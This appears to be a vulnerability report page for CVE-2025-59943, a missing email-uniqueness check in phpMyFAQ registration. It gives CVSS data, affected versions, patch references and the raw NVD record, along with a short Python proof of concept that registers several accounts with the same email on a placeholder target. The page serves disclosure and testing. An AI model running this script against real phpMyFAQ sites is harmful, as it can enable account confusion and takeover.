Security Vulnerability Report
CVE-2025-59943 CVSS 8.1 HIGH

Published: 2025-10-03 21:15:35
Last Modified: 2025-10-10 16:35:14

Description

phpMyFAQ is an open source FAQ web application. Versions 4.0-nightly-2025-10-03 and below do not enforce uniqueness of email addresses during user registration. This allows multiple distinct accounts to be created with the same email. Because email is often used as an identifier for password resets, notifications, and administrative actions, this flaw can cause account ambiguity and, in certain configurations, may lead to privilege escalation or account takeover. This issue is fixed in version 4.0.13.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:phpmyfaq:phpmyfaq:4.0.7:*:*:*:*:*:*:* - VULNERABLE
phpMyFAQ < 4.0.13
phpMyFAQ 4.0-nightly-2025-10-03 and below

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-59943 PoC - phpMyFAQ Email Uniqueness Bypass
# This PoC demonstrates registration of multiple accounts with the same email
import requests

TARGET_URL = "http://target-phpmyfaq.example.com"
REGISTER_ENDPOINT = "/register.html"  # Adjust path as needed

# Common email used for all duplicate registrations
TARGET_EMAIL = "[email protected]"

# User accounts to create with the same email
accounts = [
    {"username": "attacker1", "email": TARGET_EMAIL, "password": "Pass1234!"},
    {"username": "attacker2", "email": TARGET_EMAIL, "password": "Pass5678!"},
    {"username": "attacker3", "email": TARGET_EMAIL, "password": "Pass9012!"},
]

session = requests.Session()
created = 0  # number of registrations the heuristic below counted as successful

for i, account in enumerate(accounts):
    print(f"[*] Attempting to register account {i+1} with email: {account['email']}")

    # Step 1: Fetch registration page to obtain CSRF token if needed
    resp = session.get(f"{TARGET_URL}{REGISTER_ENDPOINT}")
    # Extract CSRF token from the page (implementation depends on phpMyFAQ version)
    # csrf_token = re.search(r'name="csrf" value="([^"]+)"', resp.text).group(1)

    # Step 2: Submit registration form with duplicate email
    data = {
        "username": account["username"],
        "email": account["email"],
        "password": account["password"],
        "password_confirm": account["password"],
        # "csrf": csrf_token,  # Include if CSRF protection is present
    }
    resp = session.post(f"{TARGET_URL}{REGISTER_ENDPOINT}", data=data)

    # Heuristic only: an HTTP 200 by itself does not prove the account was created
    if "success" in resp.text.lower() or resp.status_code == 200:
        created += 1
        print(f"[+] Account {i+1} created successfully with duplicate email!")
    else:
        print(f"[-] Account {i+1} registration failed")

# Only report the issue when more than one registration with the same email went through
if created > 1:
    print("[!] Vulnerability confirmed: Multiple accounts registered with the same email address")
else:
    print("[-] Duplicate-email registration was not observed")
```

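References

https://github.com/thorsten/phpMyFAQ/commit/44cd20f86eb041f39d1c30a9beefad1cc61dc0ec (Patch)
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j (Exploit, Vendor Advisory)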

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59943", "sourceIdentifier": "[email protected]", "published": "2025-10-03T21:15:34.757", "lastModified": "2025-10-10T16:35:13.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ is an open source FAQ web application. Versions 4.0-nightly-2025-10-03 and below do not enforce uniqueness of email addresses during user registration. This allows multiple distinct accounts to be created with the same email. Because email is often used as an identifier for password resets, notifications, and administrative actions, this flaw can cause account ambiguity and, in certain configurations, may lead to privilege escalation or account takeover. This issue is fixed in version 4.0.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-286"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], 
"configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phpmyfaq:phpmyfaq:4.0.7:*:*:*:*:*:*:*", "matchCriteriaId": "58302DB6-BBFD-41DD-B093-5AABA119E068"}]}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/commit/44cd20f86eb041f39d1c30a9beefad1cc61dc0ec", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-9wj2-4hcm-r74j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}